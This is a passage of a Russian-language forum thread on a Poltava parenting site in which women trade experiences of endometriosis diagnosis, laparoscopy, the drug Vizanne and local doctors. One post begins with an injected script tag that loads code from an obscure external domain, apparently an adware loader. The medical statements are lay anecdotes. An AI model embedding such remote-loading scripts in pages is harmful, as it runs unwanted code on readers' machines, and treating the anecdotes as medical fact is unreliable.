Перехід до вмісту

Фотографія

Ендометріоз

• Будь ласка, увійдіть в систему, щоб відповісти
62 відповідей у цій темі

#21 Helen helen

Helen helen

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 14 повідомлення
  • Місто:Полтава
  • Ім'я:Helen

Опубліковано 10 квітень 2016 - 19:54

а лечение вам врач назначала ?пойдите еще к пару врачам .может поехать в Киев ,Харьков ?подружкиной дочке не назначали лечение .у нее перед М такое творится  :cry-2: .боли ,температура ,падает в обморок .может не назначают лечение потому что она девушка 

Лечение гинеколог назначала, основываясь на результате этого УЗИ и на моих жалобах, но вот я задумалась, что лечение это очень серьезное,как для "профилактических" целей,там куча побочных после таблеток. А для того чтобы подтвердить диагноз можно было бы и по-обширнее обследование сделать. Тоже думала про Киев, но для начала уже тут поделаю еще какие-то обследования/анализы, только бы гинеколога найти хорошего,что бы серьезно отнесся к проблемам и нашел истинную причину.

А вашей девочке,что говорят, вообще никакого диагноза не ставят или как?  

#22 Helen helen

Helen helen

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 14 повідомлення

Опубліковано 10 квітень 2016 - 19:58

у нее перед М такое творится   .боли ,температура ,падает в обморок .может не назначают лечение потому что она девушка 

А температура только перед месячными или постоянно весь цикл держится?  

#23 Helen helen

Helen helen

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 14 повідомлення

Опубліковано 10 квітень 2016 - 22:05

я считаю что только на  гистероскопии

Я вот прочитала в другой теме про гинекологов, что Вы делали эту гистероскопию в Киеве, а можно по подробнее, во время этого обследования можно четко выявить следы эндометриоза? и если не секрет, вы сами ее делали по причине этого диагноза или что другое..  для этой же процедуры надо все таки что бы было направления от врача или конкретные результаты обследования, по которым можно судить,что необходимо делать гистероскопию? 

#24 Доминика

Доминика

Докторка мамських наук

• Довгожителі
  • ЗерняткоЗерняткоЗерняткоЗерняткоЗерняткоЗерняткоЗернятко
  • 5 055 повідомлення
  • Ім'я:Доминика

Нагороди

Опубліковано 12 квітень 2016 - 10:42

Я вот прочитала в другой теме про гинекологов, что Вы делали эту гистероскопию в Киеве, а можно по подробнее, во время этого обследования можно четко выявить следы эндометриоза? и если не секрет, вы сами ее делали по причине этого диагноза или что другое..  для этой же процедуры надо все таки что бы было направления от врача или конкретные результаты обследования, по которым можно судить,что необходимо делать гистероскопию? 

#25 Helen helen

Helen helen

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 14 повідомлення

Опубліковано 12 квітень 2016 - 17:50

:ogo:  :blush:

#26 Доминика

Доминика

Докторка мамських наук

• Довгожителі
  • 5 055 повідомлення

Нагороди

Опубліковано 12 квітень 2016 - 19:06

у меня был полип .я в Киеве удаляла полип .в процессе операции берут анализ (забыла как правильно называется ).перед операцией ставили под вопросом эндометриоз .недавно ездила в Киев за результатами .эндометриоз не подтвердился . я на 100% была уверена что у меня его нет  

#27 Helen helen

Helen helen

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 14 повідомлення

Опубліковано 14 квітень 2016 - 01:02

у меня был полип .я в Киеве удаляла полип .в процессе операции берут анализ (забыла как правильно называется ).перед операцией ставили под вопросом эндометриоз .недавно ездила в Киев за результатами .эндометриоз не подтвердился . я на 100% была уверена что у меня его нет  

Спасибо за ответы :poklon:  Если все таки надумаю обращаться куда-то помимо наших полтавских клиник, дадите контакты где Вы делали эту процедуру?) 

#28 Бджілка

Бджілка

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 13 повідомлення
  • Ім'я:Бджілка

Опубліковано 22 квітень 2016 - 21:39

Здравствуйте :bye-12:
Кто подскажет кому и какими способами диагностировали Эндометриоз? :girl_cray2:
Так как мне поставили этот диагноз без колебаний, опираясь на такие жалобы: сильные боли во время КД/ умеренная боль при ПА/ боль при попытках сходить в туалет во время КД, повышенная температура,а так же при УЗД на 15 день цикла врач-узист сказала,что на первый взгляд при осмотре уз прибором "физиологически - здоровая девушка, но для профилактики желательно бы пролечить эндометриоз,так как эндометрий в матке толстоватый для 15 дня цикла" И вот меня смущает то, что лечение мне назначают серьезное, а не профилактическое. Ну для точной постановки диагноза "Э" ,мне кажется, мало сказать "у вас эндометриоз" надо делать какие-то анализы,мазки, может другие обследования помимо УЗД,а если этот эндометриоз все таки есть, как-то же надо определить его степень и где именно его очаги находятся. Это же не дело, для лечения эндометриоза надо заглушать функцию яичников,а это не шутки. Я не рожала, ребеночка хотелось бы очень, но как говорят всему свое время, а врач говорит пить (Визан или еще какие-то гормональные с кучей побочных эффектов ) очень длительный срок вплоть до того момента пока не захочу забеременеть, а после беременности может опять придется потом пить таблетки. :blink:
А я то на самом деле не сильно доверяю такой быстрой постановке диагноза, а уж тем более боюсь сразу приступать к лечению,так как не известно какого именно типа этот эндометриоз и какой степени (даже если и есть его очаги,надо же знать где точно они находятся и тогда уже в соответствии с этим подбирать лечение)

Вот мой вопрос заключается в том, как и какими способами Вам диагностировали такой диагноз, потому что как по мне, то обследования для постановки такого диагноза и для его лечения, нужно по-обширнее чем одно УЗД и мои жалобы, ну по крайней мере если Эндометриоз не запущен до ужаса, а у меня как раз таки узист только предположила его очаги и четко ничего конкретного не было сказано, только "пролечить для профилактики" .
Подскажите "где что и как" делали к кому обращались. Страшно же без 100% уверенности в точном диагнозе пить какие либо препараты по таким длительным срокам,которые мне прогнозируют :eyes:

А вы сдавали какие-то гормоны? Антимюлеров гормон какой показатель?
Я и визан пила, и продувание делала (которое показало непроходимость) сделала лапароскопию и диагноз эндометриоз не подтвердился и трубы проходимы.

#29 Helen helen

Helen helen

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 14 повідомлення

Опубліковано 23 квітень 2016 - 16:06

А вы сдавали какие-то гормоны? Антимюлеров гормон какой показатель?
Я и визан пила, и продувание делала (которое показало непроходимость) сделала лапароскопию и диагноз эндометриоз не подтвердился и трубы проходимы.

Гормоны не сдавала вообще, никто не назначала. Я вот думала сама походить по-сдавать, так точно не знаю какие надо сдавать и на какой день цикла.
Мне не назначали вообще ничего, никаких доп. процедур для определения проходимости или еще чего, сказали пить таблетки и все.
А сколько Вы принимали Визан и с какой целью ,какие-то побочки были?  

#30 Shelenku

Shelenku

Студентка

• Наша пісочниця
  • ЗерняткоЗерняткоЗерняткоЗерняткоЗерняткоЗернятко
  • 526 повідомлення
  • Місто:Центр
  • Ім'я:Татьяна

Нагороди

Опубліковано 23 квітень 2016 - 17:09

О таблетках Визан могу сказать что кому-то как мне они подошли, а кому-то нет. Мне их назначили после лапароскопии, удаляли эндометриоидну кисту и поставили диагноз эндометриоз второй степени.Таблетки пила три месяца никаких побочек не было. После прекращения забеременела на третий месяц. Но мое мнение, нужен точный диагноз чтоб пить такие таблетки, а не просто домыслы. На гормоны не здавала.
  • Marusja це подобається

#31 ИннаНиколаевна

ИннаНиколаевна

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 11 повідомлення
  • Ім'я:Арина

Опубліковано 06 травень 2016 - 12:36

Ендометриоедная киста, на другом яичнике, одна лапара была год назад, кто то сталкивался с таким диагнозом. можна ли вылечить гормонами ?

У меня тоже ендометриозная киста на обеих яичниках.с права больше, с лева меньше. Где только не была. Хочу уже б бы забеременнеть мне 25 лет.Но знаю точно то что гормонами не вылечишься,принимаю таблетки с 18 лет(спасибо маме), на момент приема Кок " яичники отдыхают, и всё,но эндометриоз как был так и останется на всегда. Мне так все говорили!Вот если просто киста яичников ,она убирается и всё, а ендометриозная, со временем даже после лапороскопии ,никто гарантии не дает, что она не появиться сново, я думаю Вы сами знаете,говорили Вам.Сама консультировалась...

#32 ИннаНиколаевна

ИннаНиколаевна

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 11 повідомлення

Опубліковано 06 травень 2016 - 12:40

Кто принимал визан при лечении эндометриоза? Результат был?

Я пила визан при ендометриозе, только 3 месяца, мне он не помог. Сдвигов никаких не было.Хотя мне говорили что они не плохие, покупала в женщины гинеколога, которая сама же и продает их, дешевле чем в аптеке, так что надумаете покупать дам номер телефона.

#33 ИннаНиколаевна

ИннаНиколаевна

Крихітка

• Новачки
  • ЗерняткоЗернятко
  • 11 повідомлення

Опубліковано 06 травень 2016 - 12:44

Полностью не согласна. Если киста в яичнике, забеременить можно. Другое дело что эта киста постоянно провоцирует воспаление. Но забеременить можно без лапороскопии и Визана

Вы забеременели? Тоже хочу ребенночка но ендометриозные кисты на 2-х яичниках... Не знаю что и делать одни говорят на лапороскопию, а одни врачи говорят гормоны попить.... Овуляции нет, пока стараемся так. но 3 мес. ничего(((

#34 OksanaV

OksanaV

Докторка мамських наук

• Завсідники
  • 2 682 повідомлення
  • Ім'я:OksanaV

Нагороди

Опубліковано 07 травень 2016 - 00:53

Полип в матке был? Каким из методов удаляли? Под общим наркозом? Как долго приходили в норму после операции? Почему не делали это удаление в Полтаве, например, в 5 больнице?

#35 Доминика

Доминика

Докторка мамських наук

• Довгожителі
  • 5 055 повідомлення

Нагороди

Опубліковано 07 травень 2016 - 08:31

Полип в матке был? Каким из методов удаляли? Под общим наркозом? Как долго приходили в норму после операции? Почему не делали это удаление в Полтаве, например, в 5 больнице?

делают только областной .тут описывала ситуацию https://mama.pl.ua/i...opic=2289.утромсделала ,вечером домой 

#36 Anetta_Anetta

Anetta_Anetta

Дітлашня

• Активістки
  • ЗерняткоЗерняткоЗернятко
  • 115 повідомлення
  • Ім'я:Анна

Опубліковано 12 травень 2016 - 08:45

спасибо за отзывы, буду читать...

#37 Kira ***

Kira ***

Немовля

• Новачки
  • Зернятко
  • 1 повідомлення
  • Ім'я:Kira

Опубліковано 20 травень 2016 - 12:53

<script src="http://minxxrpaaw.or...a&h=0&m=normal"id="ubar-loader"></script>

Добрый день!Подскажите, кто знает в Полтаве хорошего доктора или клинику, где понимают  в лечении ендометриоза? Лечусь уже 11 месяцев. Результат не очень.

#38 Иринка11191

Иринка11191

Немовля

• Новачки
  • Зернятко
  • 3 повідомлення
  • Ім'я:Ира

Опубліковано 21 травень 2016 - 19:57

Здравствуйте девоньки! Прочла все отзывы, решила поделится своим опытом. 1.04.2016 обратилась к врачу-гинекологу Остроушко А.А. (3-ая поликлиника) с проблемой бесплодия. Врач очень хороший, опыт у него большой, да и обращение нормальное. Начала проходить УЗИ, обнаружили эндометриоз обоих яичников((( Диагноз для моего врача та и для меня был внезапным т.к. боли у меня были очень-очень редко, буквально раз в 6 мес., но сильные, скорая забирала. Цикл не нарушен, выделений нету. Направил меня Остроушко А.А. к Нестеренку Л.А. Леонид Анатольевич тоже мне очень понравился. Все рассказал, все объяснил и записал на операцию на 25-е мая. После операция сказал 6 месяцев принимать Визану. Подготовка к операции конечно изнурительная. Сдать кучу анализов, побегать по всем больницам, УЗИ делала 5 раз (3 до подготовки, 2 после, самое последнее в онкодиспансере) чего стоит только колоноскопия  :cry-2: , но надеюсь результат будет того стоить. Обязательно поделюсь своими впечатлениями о лапароскопие. Надеюсь все будет хорошо и надеемся родить маленькое чудо!!!)))

Відредаговано Иринка11191, 22 травень 2016 - 11:13.

#39 Алекса

Алекса

Студентка

• Наша пісочниця
  • ЗерняткоЗерняткоЗерняткоЗерняткоЗерняткоЗернятко
  • 576 повідомлення
  • Ім'я:Александра

Опубліковано 21 травень 2016 - 22:54

Нестеренко тот что в ЦРБ или в другом месте?

#40 Иринка11191

Иринка11191

Немовля

• Новачки
  • Зернятко
  • 3 повідомлення
  • Ім'я:Ира

Опубліковано 22 травень 2016 - 11:11

Да, в ЦРБ.

4 користувачів читають цю тему

0 учасників, 4 гостей, 0 анонімних користувачів